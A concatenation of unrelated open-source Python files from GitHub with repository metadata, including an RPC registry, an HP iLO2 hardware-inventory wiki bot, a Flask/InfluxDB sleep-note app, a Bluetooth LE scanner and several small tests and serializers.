import functools
from pyrpc.exceptions import DuplicatedMethodError
from pyrpc.exceptions import DuplicatedServiceError
from pyrpc.exceptions import RPCMethodNotFound
__SERVICES = {}
def get_service(name):
service = __SERVICES.get(name)
if service is None:
raise RPCMethodNotFound
return service
def add_service(service):
if service.name in __SERVICES:
raise DuplicatedServiceError('%s already registered' % service.name)
__SERVICES[service.name] = service
def remove_service(service):
if service.name in __SERVICES:
__SERVICES.pop(service.name)
class Service(object):
"""Remote Procedure Call Service."""
def __init__(self, name):
"""Create new .. class:RPCService instance
:param name: service name
"""
self.name = name
self.methods = {}
add_service(self)
def add_method(self, method, func, **kw):
"""Add new method.
:param method: name of the method
:param func: callable object
:raises DuplicatedMethodError: if the method name is already registered
"""
if method in self.methods:
msg = 'method %s already register for %s' % (method, self.name)
raise DuplicatedMethodError(msg)
if 'klass' in kw and not callable(func):
func = UnboundMethod(kw['klass'], func)
self.methods[method] = func
def method(self, method):
"""Decorator for registering new service method.
:param method: name of the method
"""
def wrapper(func):
self.add_method(method, func)
functools.wraps(func)
return func
return wrapper
def execute(self, method, request):
"""Execute a method.
:param method: name of the method
        :param request: request object passed through to the method
:raises RPCMethodNotFound: if the method does not exist
"""
func = self.methods.get(method)
if func is None:
raise RPCMethodNotFound
return func(request)
class UnboundMethod(object):
def __init__(self, klass, method):
self.klass = klass
self.method = method
self.__name__ = method
def __call__(self, request):
obj = self.klass(request)
method = getattr(obj, self.method)
return method()
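# Usage sketch (the service and method names are made up for illustration; the shape
# of 'request' is whatever the caller chooses to pass through execute()):
if __name__ == '__main__':
    calc = Service('calculator')

    @calc.method('add')
    def add(request):
        # Service.execute() hands the request object straight to the method.
        return sum(request)

    print(get_service('calculator').execute('add', [1, 2, 3]))  # -> 6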
| {
"content_hash": "f9c42bcb12f961394aea64a79ac9232a",
"timestamp": "",
"source": "github",
"line_count": 92,
"max_line_length": 79,
"avg_line_length": 26.42391304347826,
"alnum_prop": 0.613739201974496,
"repo_name": "winstonf88/pyrpc",
"id": "86b59c1c987037bfe19b720c762e53a7d25d21d8",
"size": "2431",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pyrpc/service.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "16485"
}
],
"symlink_target": ""
} |
from basicmvc.tests.basic_test import BasicTest
| {
"content_hash": "5478ae8ee0de32ab2535ad6120c40321",
"timestamp": "",
"source": "github",
"line_count": 1,
"max_line_length": 47,
"avg_line_length": 48,
"alnum_prop": 0.8541666666666666,
"repo_name": "LiorZ/pygame-mvc",
"id": "196b3031ec5e92932fb46e55911c4a99a37e4ce0",
"size": "48",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "basicmvc/tests/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "2015"
}
],
"symlink_target": ""
} |
from flask import redirect, Module, url_for, request
main = Module(__name__)
@main.route('/')
def index():
return redirect(url_for('zones.zones_list'))
| {
"content_hash": "c79dee85f327c2c04b047cfad5051d65",
"timestamp": "",
"source": "github",
"line_count": 8,
"max_line_length": 52,
"avg_line_length": 19.875,
"alnum_prop": 0.6729559748427673,
"repo_name": "sysbot/route53manager",
"id": "9d7f0655a541f45a97c5d8901a495898b61f6c49",
"size": "159",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "route53/views/main.py",
"mode": "33188",
"license": "mit",
"language": [],
"symlink_target": ""
} |
"""
"""
import wikipedia
import pagegenerators, catlib, re, socket, sys
import base64
import struct
class ILO2InventoryBot:
def __init__(self, hosts_generator):
self.hosts_generator = hosts_generator
def run(self):
for page in self.hosts_generator:
if not "." in page.title(): continue
self.processpage(page)
def processpage(self, page):
wikipedia.setAction(u'Robot: update hardware inventory')
print page.title()
oldlines = page.get().split("\r\n")
newlines = list()
data = dict()
# find ILO IP, and fetch data
for line in oldlines:
if not line.startswith("|OOBIP="): continue
oobip = line.split("=")[1].replace("\r","")
print repr(oobip)
if oobip == "": continue
data = self.fetchIloData(oobip)
break
# do string formatting for RAMUSED
if data.has_key('ram'):
sizescount = dict()
for rammodule in data['ram']:
# ignore empty banks
if rammodule['size'] == 0: continue
if not sizescount.has_key(rammodule['size']): sizescount[rammodule['size']] = 0
sizescount[rammodule['size']] = sizescount[rammodule['size']] + 1
sizes = sizescount.keys()
sizes.sort(reverse=True)
ram = list()
for size in sizes:
ram.append('%dx %dMB' % (sizescount[size], size))
data['ram'] = " + ".join(ram)
if data.has_key('cpus'):
cputypes = dict()
for i in range(0, data['cpus']):
cputype = data['cpu'+str(i+1)]
if not cputypes.has_key(cputype): cputypes[cputype] = 0
cputypes[cputype] += 1
cpu = []
types = cputypes.keys()
types.sort()
for cputype in types:
cpu.append('%dx %s' % (cputypes[cputype], cputype))
data['cpu'] = ", ".join(cpu)
# now replace the values
for line in oldlines:
if line.startswith("|SN=") and data.has_key('serialnumber'):
line = "|SN=" + data['serialnumber']
del data['serialnumber']
if line.startswith("|PN=") and data.has_key('skunumber'):
line = "|PN=" + data['skunumber']
del data['skunumber']
if line.startswith("|OOBMAC") and data.has_key('oobmac'):
line = "|OOBMAC=" + data['oobmac']
del data['oobmac']
if line.startswith("|RAMUSED") and data.has_key('ram'):
line = "|RAMUSED=" + data['ram']
del data['ram']
if line.startswith("|CPUUSED") and data.has_key('cpu'):
line = "|CPUUSED=" + str(data['cpu'])
del data['cpu']
if line.startswith("|RPSUSED") and data.has_key('rpsused'):
line = "|RPSUSED=" + str(data['rpsused'])
del data['rpsused']
if line.startswith("|NICMAC1") and data.has_key('nicmac1'):
line = "|NICMAC1=" + str(data['nicmac1'])
del data['nicmac1']
if line.startswith("|NICMAC2") and data.has_key('nicmac2'):
line = "|NICMAC2=" + str(data['nicmac2'])
del data['nicmac2']
if line.startswith("}}"):
# hardware template is over, add probably missing lines
if data.has_key('skunumber'): newlines.append("|PN=" + data['skunumber'])
if data.has_key('rpsused'): newlines.append("|RPSUSED=" + str(data['rpsused']))
# now ensure that no other changes are made
data = dict()
newlines.append(line)
pagetext = "\r\n".join(newlines)
# save, if there are differences
if page.get() == pagetext: return
wikipedia.showDiff(page.get(), pagetext)
# Save the page
try:
page.put(pagetext)
except wikipedia.LockedPage:
wikipedia.output(u"Page %s is locked; skipping." % page.aslink())
except wikipedia.EditConflict:
wikipedia.output(u'Skipping %s because of edit conflict' % (page.title()))
except wikipedia.SpamfilterError, error:
wikipedia.output(u'Cannot change %s because of spam blacklist entry %s' % (page.title(), error.url))
def fetchIloData(self, iloaddress):
results = dict()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((iloaddress, 443))
except socket.gaierror:
return results
except socket.error:
return results
s = socket.ssl(sock)
xml_header = '<?xml version="1.0"?>'
xml = """<RIBCL version="2.21">
<LOGIN USER_LOGIN="%s" PASSWORD="%s">
<SERVER_INFO MODE="READ" >
<GET_HOST_DATA />
<GET_EMBEDDED_HEALTH />
</SERVER_INFO>
<RIB_INFO MODE="read">
<GET_NETWORK_SETTINGS/>
</RIB_INFO>
</LOGIN>
</RIBCL>
"""
xml = xml_header + "\n" + (xml % (wikipedia.config.bot_hpilo2_ilo_username, wikipedia.config.bot_hpilo2_ilo_password))
for line in xml.split("\n"):
s.write(line + "\r\n")
data = ""
while True:
try:
data = data + s.read()
if "</RIB_INFO>" in data: break
except socket.sslerror:
break
del s
sock.close()
        # pre-split the response into lines
data = data.split("\n")
# preprocess hostdata, save away cache structs
in_host_data = False
cachestructs = {}
for line in data:
if '<GET_HOST_DATA>' in line:
in_host_data = True
continue
if '</GET_HOST_DATA>' in line:
in_host_data = False
continue
if not in_host_data: continue
if not '<SMBIOS_RECORD ' in line: continue
smbios_data = line.split("B64_DATA=\"")[1].split("\"")[0]
smbios_data = base64.b64decode(smbios_data)
if 'TYPE="7"' in line:
this = dict()
handle = struct.unpack('H', smbios_data[0x2:0x4])[0]
size = struct.unpack('H', smbios_data[0x9:0xB])[0] & 0xFF
size = size * 64
cachestructs[handle] = size
# now process data
in_host_data = False
for line in data:
if '<GET_HOST_DATA>' in line:
in_host_data = True
continue
if '</GET_HOST_DATA>' in line:
in_host_data = False
continue
if not in_host_data: continue
if not '<SMBIOS_RECORD ' in line: continue
smbios_data = line.split("B64_DATA=\"")[1].split("\"")[0]
smbios_data = base64.b64decode(smbios_data)
if 'TYPE="1"' in line:
# System ID
this = dict()
# byte 0 is the type, MUST be 1
# byte 1 is the length, on HP machines I've only observed 0x19 (SMBIOS v2.1-2.3.4) or 0x1Bh (2.4 or latter)
length = ord(smbios_data[0x1])
strings = smbios_data[length:].split("\x00")
# byte 5 is the productname (string#)
self.from_smbios_string('productname', smbios_data, strings, length, 0x5, this)
# byte 6 is the version (string#)
self.from_smbios_string('version', smbios_data, strings, length, 0x6, this)
# byte 7 is the serialnumber (string#)
self.from_smbios_string('serialnumber', smbios_data, strings, length, 0x7, this)
# byte 8 is the uuid (16 bytes)
# byte 19 is the sku number (string#)
self.from_smbios_string('skunumber', smbios_data, strings, length, 0x19, this)
# byte 1a is the family (string#)
self.from_smbios_string('family', smbios_data, strings, length, 0x1a, this)
results.update(this)
if 'TYPE="4"' in line:
# CPU
length = ord(smbios_data[0x1])
strings = smbios_data[length:].split("\x00")
if smbios_data[0x16] == '\x00' and smbios_data[0x17] == '\x00':
# no cpu present
pass
else:
this = dict()
self.from_smbios_string('socketname', smbios_data, strings, length, 0x4, this)
self.from_smbios_string('vendor', smbios_data, strings, length, 0x7, this)
this['cores'] = ord(smbios_data[0x23])
if this['cores'] == 2: this['corestr'] = 'Dual-Core'
if this['cores'] == 4: this['corestr'] = 'Quad-Core'
this['cpufamily'] = ord(smbios_data[0x6])
this['fsb'] = struct.unpack('H', smbios_data[0x12:0x14])[0]
this['speed'] = struct.unpack('H', smbios_data[0x16:0x18])[0]
this['sockettype'] = ord(smbios_data[0x19])
if this['sockettype'] == 0x15: this['socketstr'] = 'LGA775'
if this['sockettype'] == 0x14: this['socketstr'] = 'LGA771'
this['l2cachesize'] = cachestructs[struct.unpack('H', smbios_data[0x1C:0x1E])[0]]
# this is mad guesswork.
if this['cpufamily'] in (0xb3,0xaa): this['cpufamstr'] = 'Xeon'
if this['cpufamily'] == 0xb3 and this['fsb'] == 1066:
if this['cores'] == 2 and this['l2cachesize'] == 4096:
if this['speed'] == 2400: this['model'] = '3060'
if this['cpufamily'] == 0xb3 and this['fsb'] == 1333:
if this['cores'] == 2 and this['l2cachesize'] == 4096:
if this['speed'] == 2000: this['model'] = '5130'
if this['speed'] == 2333: this['model'] = '5140'
if this['speed'] == 2666: this['model'] = '5150'
if this['speed'] == 3000: this['model'] = '5160'
if this['cores'] == 4:
if this['l2cachesize'] == 8192:
if this['speed'] == 2000: this['model'] = 'E5335'
if this['speed'] == 2333: this['model'] = 'E5345'
if this['l2cachesize'] == 12288:
if this['speed'] == 2000: this['model'] = 'E5405'
if this['speed'] == 2333: this['model'] = 'E5410'
if this['speed'] == 2500: this['model'] = 'E5420'
if this['speed'] == 2666: this['model'] = 'E5430'
if this['speed'] == 2833: this['model'] = 'E5440'
if this['speed'] == 3000: this['model'] = 'E5450'
# Nehalem
if this['cpufamily'] == 0xaa and this['fsb'] == 133:
if this['cores'] == 4 and this['l2cachesize'] == 1024:
if this['speed'] == 2533: this['model'] = 'E5540'
if not this.has_key('model'):
print 'Unknown CPU, details: speed=%s, cores=%s, fsb=%s, family=%x, l2cache=%s' % (this['speed'], this['cores'], this['fsb'], this['cpufamily'], this['l2cachesize'])
this['model'] = 'UnknownCPU'
if not results.has_key('cpus'): results['cpus'] = 0
results['cpus'] += 1
thiscpu = 'cpu' + str(results['cpus'])
results[thiscpu] = '%s %s %s %s' % (this['vendor'], this['corestr'], this['cpufamstr'], this['model'])
if 'TYPE="17"' in line:
# Memory
this = dict()
length = ord(smbios_data[0x1])
strings = smbios_data[length:].split("\x00")
self.from_smbios_string('device_locator', smbios_data, strings, length, 0x10, this)
self.from_smbios_string('bank_locator', smbios_data, strings, length, 0x11, this)
this['size'] = struct.unpack('H', smbios_data[0x0c:0x0e])[0]
if not results.has_key('ram'):
results['ram'] = list()
results['ram'].append(this)
if 'TYPE="209"' in line:
# NIC Ethernet Addresses
results['nicmac1'] = "%02X:%02X:%02X:%02X:%02X:%02X" % (ord(smbios_data[6]), ord(smbios_data[7]), ord(smbios_data[8]), ord(smbios_data[9]), ord(smbios_data[10]), ord(smbios_data[11]))
results['nicmac2'] = "%02X:%02X:%02X:%02X:%02X:%02X" % (ord(smbios_data[14]), ord(smbios_data[15]), ord(smbios_data[16]), ord(smbios_data[17]), ord(smbios_data[18]), ord(smbios_data[19]))
in_network_settings = False
for line in data:
if not in_network_settings and not '<GET_NETWORK_SETTINGS>' in line: continue
if '<GET_NETWORK_SETTINGS>' in line:
in_network_settings = True
continue
if '</GET_NETWORK_SETTINGS>' in line:
in_network_settings = False
continue
if in_network_settings and '<MAC_ADDRESS' in line:
value = line.split("VALUE=\"")[1].split("\"")[0]
results['oobmac'] = value.upper()
in_power_supplies = False
this_power_supply = ''
results['rpsused'] = 0
for line in data:
if not in_power_supplies and not '<POWER_SUPPLIES>' in line: continue
if '<POWER_SUPPLIES>' in line:
in_power_supplies = True
continue
if '</POWER_SUPPLIES>' in line:
in_power_supplies = False
continue
if in_power_supplies:
if '<SUPPLY>' in line: this_power_supply = ''
if this_power_supply == None:
pass
elif this_power_supply == '':
if '<LABEL' in line: this_power_supply = line.split("Power Supply ")[1].split("\"")[0]
elif len(this_power_supply) > 0:
if '<STATUS' in line:
value = line.split("VALUE = \"")[1].split("\"")[0]
if value == "Ok": results['rpsused'] = results['rpsused'] + 1
if '</SUPPLY' in line: this_power_supply = None
return results
def from_smbios_string(self, name, smbios_data, strings, length, offset, this):
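        # Resolve an SMBIOS string reference: the byte at 'offset' holds a 1-based index
        # into the structure's trailing string table; store the stripped value in this[name].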
tmp = ''
if length >= offset:
stringid = ord(smbios_data[offset])
if stringid > 0 and len(strings) >= stringid:
tmp = strings[stringid-1].strip()
if tmp != '':
this[name] = tmp
def main():
gen = None
cat = catlib.Category(wikipedia.getSite(), 'Category:HP ILO2')
hosts_gen = pagegenerators.CategorizedPageGenerator(cat, start = None, recurse = False)
hosts_gen = pagegenerators.PreloadingGenerator(hosts_gen)
bot = ILO2InventoryBot(hosts_gen)
bot.run()
if __name__ == "__main__":
try:
main()
finally:
wikipedia.stopme()
| {
"content_hash": "849fac10d06230c7324c04da9a6f0316",
"timestamp": "",
"source": "github",
"line_count": 344,
"max_line_length": 191,
"avg_line_length": 35.69767441860465,
"alnum_prop": 0.6215798045602606,
"repo_name": "sicekit/sicekit",
"id": "86e8902c953f3291f6a78c9b5731bccb68667c60",
"size": "12323",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "robots/robot-update_hp_servers_ilo2.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "82920"
},
{
"name": "PHP",
"bytes": "11147"
},
{
"name": "Python",
"bytes": "1123422"
}
],
"symlink_target": ""
} |
import os
import sys
import pprint
def dump_environ():
print 'os.environ'
pprint.pprint(dict(os.environ))
print
print 'sys.path'
pprint.pprint(list(sys.path))
print
if __name__ == '__main__':
# from .. import submit_ext
# future = submit_ext('qbfutures.test.environ:dump_environ', name="QBFutures Python Environment Test", priority=8000)
# print 'python', future.job_id
from ..maya import Executor
future = Executor().submit_ext('qbfutures.test.environ:dump_environ', name='QBFutures Environment Test', priority=9000)
print 'maya', future.job_id
| {
"content_hash": "662983c9e4c10649845f817801a0689f",
"timestamp": "",
"source": "github",
"line_count": 23,
"max_line_length": 123,
"avg_line_length": 26.608695652173914,
"alnum_prop": 0.6633986928104575,
"repo_name": "westernx/qbfutures",
"id": "659b922902cf969c2719c0254e17d9aeab911ea9",
"size": "612",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "qbfutures/test/environ.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "38146"
}
],
"symlink_target": ""
} |
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import absolute_import
from .classifier import MILBoostClassifier
from .softmax import *
| {
"content_hash": "0e5af0fdbf04a9bbcb3728efaccebcd3",
"timestamp": "",
"source": "github",
"line_count": 7,
"max_line_length": 42,
"avg_line_length": 30.857142857142858,
"alnum_prop": 0.7824074074074074,
"repo_name": "hbldh/skboost",
"id": "6381a941869d4a3d60a70899d2b296dd4c91d10b",
"size": "216",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "skboost/milboost/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "17794"
},
{
"name": "Jupyter Notebook",
"bytes": "9983"
},
{
"name": "Python",
"bytes": "108484"
}
],
"symlink_target": ""
} |
from dateutil.parser import parse
from math import modf
from time import mktime
import csv
import StringIO
import sleepdebugger.config as config
from flask import Flask, request, flash, url_for, render_template, redirect, Response
from flask_debugtoolbar import DebugToolbarExtension
from influxdb import InfluxDBClient
app = Flask(__name__,
static_url_path = "/static",
static_folder = "sleepdebugger/web/static",
template_folder = "sleepdebugger/web/template")
app.secret_key = config.SECRET_KEY
app.debug = config.DEBUG
toolbar = DebugToolbarExtension(app)
@app.route("/", methods=['GET'])
def index():
return render_template("index")
@app.route("/", methods=['POST'])
def record():
txt = request.form['entry']
    influx = None
    try:
influx = InfluxDBClient(config.INFLUX_HOST, config.INFLUX_PORT, config.INFLUX_USER, config.INFLUX_PASSWD, config.INFLUX_DB)
except Exception as err:
flash("Entry was not recorded. Influx connection error: %s" % str(err))
if influx:
json_body = [
{
"measurement": "notes",
"tags":
{
"sleeper": config.SLEEPER
},
"fields": { 'note' : txt }
}
]
try:
influx.write_points(json_body)
flash('Entry recorded.')
except Exception as err:
flash("Entry was not recorded. Influx write error: %s" % str(err))
return render_template("index")
@app.route("/export", methods=['GET'])
def export():
return render_template("export")
@app.route("/export", methods=['POST'])
def export_data():
start = request.form['start']
end = request.form['end']
try:
start = parse(start)
except ValueError:
flash("Cannot decipher format of start time.")
return render_template("export", start=request.form['start'], end=request.form['end'])
try:
end = parse(end)
except ValueError:
flash("Cannot decipher format of end time.")
return render_template("export", start=request.form['start'], end=request.form['end'])
try:
influx = InfluxDBClient(config.INFLUX_HOST, config.INFLUX_PORT, config.INFLUX_USER, config.INFLUX_PASSWD, config.INFLUX_DB)
except Exception as err:
flash("Cannot connect to DB.")
return render_template("export", start=request.form['start'], end=request.form['end'])
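    # InfluxDB expects epoch timestamps in nanoseconds; split the float epoch into its
    # integer and fractional parts and concatenate them as a nanosecond string.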
decimal, integer = modf(mktime(start.timetuple()))
start = "%d" % integer + "%09d" % (decimal * 1000000000)
decimal, integer = modf(mktime(end.timetuple()))
end = "%d" % integer + "%09d" % (decimal * 1000000000)
query = "SELECT mag FROM sleep WHERE time >= %s and time <= %s" % (start, end)
try:
results = influx.query(query)
except Exception as e:
flash("Cannot query influx: %s" % str(e))
return render_template("export", start=request.form['start'], end=request.form['end'])
si = StringIO.StringIO()
cw = csv.writer(si)
for result in results.get_points(measurement="sleep"):
print result
cw.writerow([ result['time'], result['mag'] ])
return Response(si.getvalue().strip('\r\n'), mimetype='text/csv')
if __name__ == "__main__":
app.run(host=config.HOST, port=config.PORT, threaded=True)
| {
"content_hash": "6a798b3b185cd0dd462b52a62ea07e38",
"timestamp": "",
"source": "github",
"line_count": 100,
"max_line_length": 131,
"avg_line_length": 33.27,
"alnum_prop": 0.6236850015028554,
"repo_name": "mayhem/sleep-debugger",
"id": "1aa360cad8a68b84a58d45839c78f2bb11176c24",
"size": "3350",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "server.py",
"mode": "33261",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "13567"
}
],
"symlink_target": ""
} |
from cloudferrylib.base.action import action
class SnapTransfer(action.Action):
def __init__(self, init, driver,
snap_position):
super(SnapTransfer, self).__init__(init)
self.driver = driver(self.src_cloud, self.dst_cloud)
self.snap_position = snap_position
def run(self, volume, snapshot_info, **kwargs):
self.driver.transfer(volume, snapshot_info, self.snap_position)
return {}
| {
"content_hash": "9617f7029ffaa73468106db5353139df",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 71,
"avg_line_length": 34.46153846153846,
"alnum_prop": 0.6473214285714286,
"repo_name": "mgrygoriev/CloudFerry",
"id": "8888aa1640da44f92b818bd902b60f9b02a571d4",
"size": "1024",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "cloudferrylib/os/actions/snap_transfer.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "2615"
},
{
"name": "Python",
"bytes": "775433"
},
{
"name": "Ruby",
"bytes": "5181"
},
{
"name": "Shell",
"bytes": "34787"
}
],
"symlink_target": ""
} |
import asyncio
import sys
import os
import logging
from colors import color
from bumble.device import Device
from bumble.transport import open_transport_or_link
# -----------------------------------------------------------------------------
async def main():
if len(sys.argv) < 2:
print('Usage: run_scanner.py <transport-spec> [filter]')
print('example: run_scanner.py usb:0')
return
print('<<< connecting to HCI...')
async with await open_transport_or_link(sys.argv[1]) as (hci_source, hci_sink):
print('<<< connected')
filter_duplicates = (len(sys.argv) == 3 and sys.argv[2] == 'filter')
device = Device.with_hci('Bumble', 'F0:F1:F2:F3:F4:F5', hci_source, hci_sink)
@device.on('advertisement')
def _(advertisement):
address_type_string = ('PUBLIC', 'RANDOM', 'PUBLIC_ID', 'RANDOM_ID')[advertisement.address.address_type]
address_color = 'yellow' if advertisement.is_connectable else 'red'
address_qualifier = ''
if address_type_string.startswith('P'):
type_color = 'cyan'
else:
if advertisement.address.is_static:
type_color = 'green'
address_qualifier = '(static)'
elif advertisement.address.is_resolvable:
type_color = 'magenta'
address_qualifier = '(resolvable)'
else:
type_color = 'white'
separator = '\n '
print(f'>>> {color(advertisement.address, address_color)} [{color(address_type_string, type_color)}]{address_qualifier}:{separator}RSSI:{advertisement.rssi}{separator}{advertisement.data.to_string(separator)}')
await device.power_on()
await device.start_scanning(filter_duplicates=filter_duplicates)
await hci_source.wait_for_termination()
# -----------------------------------------------------------------------------
logging.basicConfig(level = os.environ.get('BUMBLE_LOGLEVEL', 'DEBUG').upper())
asyncio.run(main())
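# Example invocation (the transport spec below is only an illustration, as in
# the usage text printed by main()):
#   python run_scanner.py usb:0 filter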
| {
"content_hash": "64f12fbbf75deb2ca40fb9b4d40f2c91",
"timestamp": "",
"source": "github",
"line_count": 52,
"max_line_length": 222,
"avg_line_length": 40.23076923076923,
"alnum_prop": 0.5587954110898662,
"repo_name": "google/bumble",
"id": "719e58edd13369b391eee74e9a9c74105dadee11",
"size": "2844",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "examples/run_scanner.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "4387"
},
{
"name": "Python",
"bytes": "1318219"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import
import six
from sentry.api.serializers import Serializer, register
from sentry.models import GroupTagKey, TagKey
@register(GroupTagKey)
class GroupTagKeySerializer(Serializer):
def get_attrs(self, item_list, user):
tag_labels = {
t.key: t.get_label()
for t in
TagKey.objects.filter(project=item_list[0].project, key__in=[i.key for i in item_list])
}
result = {}
for item in item_list:
key = TagKey.get_standardized_key(item.key)
try:
label = tag_labels[item.key]
except KeyError:
label = key
result[item] = {
'name': label,
'key': key,
}
return result
def serialize(self, obj, attrs, user):
return {
'id': six.text_type(obj.id),
'name': attrs['name'],
'key': attrs['key'],
'uniqueValues': obj.values_seen,
}
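# For illustration, a serialized entry comes out shaped like (values are
# hypothetical):
#   {"id": "1", "name": "Browser", "key": "browser", "uniqueValues": 42}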
| {
"content_hash": "2c0a709933a647aac468e6135cff9af4",
"timestamp": "",
"source": "github",
"line_count": 37,
"max_line_length": 99,
"avg_line_length": 27.7027027027027,
"alnum_prop": 0.5287804878048781,
"repo_name": "jean/sentry",
"id": "c2638a5a7fa4fac097dd9efc8b424e2e330b7205",
"size": "1025",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/sentry/api/serializers/models/grouptagkey.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "296112"
},
{
"name": "HTML",
"bytes": "314273"
},
{
"name": "JavaScript",
"bytes": "1293918"
},
{
"name": "Lua",
"bytes": "57158"
},
{
"name": "Makefile",
"bytes": "6632"
},
{
"name": "Python",
"bytes": "24515298"
},
{
"name": "Ruby",
"bytes": "4410"
},
{
"name": "Shell",
"bytes": "2942"
}
],
"symlink_target": ""
} |
while True:
s = raw_input('command:')
if s == 'exit':
break
print 'Length of string is:', len(s)
else:
print 'I won\'t be executed'
print 'over'
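# Note: the else clause of a while loop runs only when the loop ends without a
# break; since the only exit here is the break above, the else branch never
# executes (which is exactly what its message says).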
| {
"content_hash": "ab2526bb0cbf37d238176762ce7c8484",
"timestamp": "",
"source": "github",
"line_count": 8,
"max_line_length": 40,
"avg_line_length": 22.125,
"alnum_prop": 0.536723163841808,
"repo_name": "Akagi201/learning-python",
"id": "598024d25ad4e0d937c9d71fc1a2659b1265cca9",
"size": "177",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pyramid/Pyramid Web开发入门/1. Python基础和入门介绍/break.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "125"
},
{
"name": "CSS",
"bytes": "82315"
},
{
"name": "HTML",
"bytes": "16738"
},
{
"name": "JavaScript",
"bytes": "253132"
},
{
"name": "Jupyter Notebook",
"bytes": "3666"
},
{
"name": "Less",
"bytes": "2022"
},
{
"name": "Mako",
"bytes": "412"
},
{
"name": "Procfile",
"bytes": "21"
},
{
"name": "Python",
"bytes": "336950"
},
{
"name": "Rich Text Format",
"bytes": "49342"
},
{
"name": "Shell",
"bytes": "4498"
}
],
"symlink_target": ""
} |
from django.apps import AppConfig
class FinoteApiConfig(AppConfig):
name = 'finote_api'
| {
"content_hash": "ccbcff8d91a6b98dfc686de254e44e83",
"timestamp": "",
"source": "github",
"line_count": 5,
"max_line_length": 33,
"avg_line_length": 18.8,
"alnum_prop": 0.7553191489361702,
"repo_name": "kentaiwami/FiNote",
"id": "d71cf7da32304b6894e9736bd15535ae2b9a395d",
"size": "94",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "server/src/finote_api/apps.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Dockerfile",
"bytes": "225"
},
{
"name": "Python",
"bytes": "72168"
},
{
"name": "Ruby",
"bytes": "776"
},
{
"name": "Shell",
"bytes": "6122"
},
{
"name": "Swift",
"bytes": "145555"
}
],
"symlink_target": ""
} |
import ctypes
import pathlib
# refer to https://realpython.com/python-bindings-overview
if __name__ == "__main__":
# Load the shared library into ctypes
libname = pathlib.Path().absolute() / "libtiny_util.so"
print("load " + str(libname))
c_lib = ctypes.CDLL(libname)
num = 2.3
ret = c_lib.round_to_int(ctypes.c_float(num))
print("{} round to {} ".format(num, str(ret)))
text = "hello world"
wave = "hello.wav"
b_text = text.encode("utf-8")
b_wave = wave.encode("utf-8")
    ret2 = c_lib.text_to_wav(ctypes.c_char_p(b_text), ctypes.c_char_p(b_wave))
 | {
"content_hash": "24e0102984baee65853f9ab0b3d60c42",
"timestamp": "",
"source": "github",
"line_count": 23,
"max_line_length": 78,
"avg_line_length": 26.08695652173913,
"alnum_prop": 0.6166666666666667,
"repo_name": "walterfan/snippets",
"id": "9a36dc9dfb210f2906941d28a39634c1b07cdcac",
"size": "600",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "c/tiny_util_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ANTLR",
"bytes": "349"
},
{
"name": "Assembly",
"bytes": "231"
},
{
"name": "C",
"bytes": "254487"
},
{
"name": "C++",
"bytes": "421817"
},
{
"name": "CSS",
"bytes": "105318"
},
{
"name": "Dockerfile",
"bytes": "510"
},
{
"name": "Go",
"bytes": "3430"
},
{
"name": "HTML",
"bytes": "1850853"
},
{
"name": "Java",
"bytes": "229173"
},
{
"name": "JavaScript",
"bytes": "294777"
},
{
"name": "Jupyter Notebook",
"bytes": "613818"
},
{
"name": "Lex",
"bytes": "1334"
},
{
"name": "Lua",
"bytes": "147083"
},
{
"name": "Makefile",
"bytes": "22205"
},
{
"name": "PHP",
"bytes": "25856"
},
{
"name": "Python",
"bytes": "57064"
},
{
"name": "QMake",
"bytes": "356"
},
{
"name": "Shell",
"bytes": "110"
},
{
"name": "TypeScript",
"bytes": "7461"
},
{
"name": "Yacc",
"bytes": "1084"
}
],
"symlink_target": ""
} |
import unittest
import mock
class TestConnection(unittest.TestCase):
@staticmethod
def _get_target_class():
from google.cloud.storage._http import Connection
return Connection
def _make_one(self, *args, **kw):
return self._get_target_class()(*args, **kw)
def test_extra_headers(self):
from google.cloud import _http as base_http
from google.cloud.storage import _http as MUT
http = mock.Mock(spec=['request'])
response = mock.Mock(status=200, spec=['status'])
data = b'brent-spiner'
http.request.return_value = response, data
client = mock.Mock(_http=http, spec=['_http'])
conn = self._make_one(client)
req_data = 'hey-yoooouuuuu-guuuuuyyssss'
result = conn.api_request(
'GET', '/rainbow', data=req_data, expect_json=False)
self.assertEqual(result, data)
expected_headers = {
'Content-Length': str(len(req_data)),
'Accept-Encoding': 'gzip',
base_http.CLIENT_INFO_HEADER: MUT._CLIENT_INFO,
'User-Agent': conn.USER_AGENT,
}
expected_uri = conn.build_api_url('/rainbow')
http.request.assert_called_once_with(
body=req_data,
headers=expected_headers,
method='GET',
uri=expected_uri,
)
def test_build_api_url_no_extra_query_params(self):
conn = self._make_one(object())
URI = '/'.join([
